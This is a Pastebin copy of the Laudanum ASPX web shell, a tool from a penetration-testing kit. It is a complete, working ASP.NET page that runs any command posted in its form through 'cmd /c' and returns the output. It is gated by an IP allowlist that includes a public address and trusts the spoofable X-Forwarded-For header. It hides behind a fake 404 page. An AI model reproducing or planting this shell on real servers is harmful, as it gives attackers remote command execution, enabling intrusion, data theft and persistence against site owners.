Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <%@ Page Language="C#"%>
- <%@ Import Namespace="System" %>
- <script runat="server">
- /* *****************************************************************************
- ***
- *** Laudanum Project
- *** A Collection of Injectable Files used during a Penetration Test
- ***
- *** More information is available at:
- *** http://laudanum.secureideas.net
- *** laudanum@secureideas.net
- ***
- *** Project Leads:
- *** Kevin Johnson <kjohnson@secureideas.net>
- *** Tim Medin <tim@counterhack.com>
- ***
- *** Copyright 2014 by Kevin Johnson and the Laudanum Team
- ***
- ********************************************************************************
- ***
- *** This file provides shell access to the system.
- ***
- ********************************************************************************
- *** This program is free software; you can redistribute it and/or
- *** modify it under the terms of the GNU General Public License
- *** as published by the Free Software Foundation; either version 2
- *** of the License, or (at your option) any later version.
- ***
- *** This program is distributed in the hope that it will be useful,
- *** but WITHOUT ANY WARRANTY; without even the implied warranty of
- *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- *** GNU General Public License for more details.
- ***
- *** You can get a copy of the GNU General Public License from this
- *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
- *** You can also write to the Free Software Foundation, Inc., 59 Temple
- *** Place - Suite 330, Boston, MA 02111-1307, USA.
- ***
- ***************************************************************************** */
- string stdout = "";
- string stderr = "";
- void die() {
- //HttpContext.Current.Response.Clear();
- HttpContext.Current.Response.StatusCode = 404;
- HttpContext.Current.Response.StatusDescription = "Not Found";
- HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
- HttpContext.Current.Server.ClearError();
- HttpContext.Current.Response.End();
- }
- void Page_Load(object sender, System.EventArgs e) {
- // Check for an IP in the range we want
- string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1", "5.79.113.48"};
- // check if the X-Fordarded-For header exits
- string remoteIp;
- if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
- remoteIp = Request.UserHostAddress;
- } else {
- remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
- }
- bool validIp = false;
- foreach (string ip in allowedIps) {
- validIp = (validIp || (remoteIp == ip));
- }
- if (!validIp) {
- die();
- }
- if (Request.Form["c"] != null) {
- // do or do not, there is no try
- //try {
- // create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
- // "/c" tells cmd that we want it to execute the command that follows, and exit.
- System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
- // The following commands are needed to redirect the standard output and standard error.
- procStartInfo.RedirectStandardOutput = true;
- procStartInfo.RedirectStandardError = true;
- procStartInfo.UseShellExecute = false;
- // Do not create the black window.
- procStartInfo.CreateNoWindow = true;
- // Now we create a process, assign its ProcessStartInfo and start it
- System.Diagnostics.Process p = new System.Diagnostics.Process();
- p.StartInfo = procStartInfo;
- p.Start();
- // Get the output and error into a string
- stdout = p.StandardOutput.ReadToEnd();
- stderr = p.StandardError.ReadToEnd();
- //}
- //catch (Exception objException)
- //{
- }
- }
- </script>
- <html>
- <head><title>Laundanum ASPX Shell</title></head>
- <body onload="document.shell.c.focus()">
- <form method="post" name="shell">
- cmd /c <input type="text" name="c"/>
- <input type="submit"><br/>
- STDOUT:<br/>
- <pre><% = stdout.Replace("<", "<") %></pre>
- <br/>
- <br/>
- <br/>
- STDERR:<br/>
- <pre><% = stderr.Replace("<", "<") %></pre>
- </form>
- <hr/>
- <address>
- Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
- Written by Tim Medin.<br/>
- Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
- </address>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement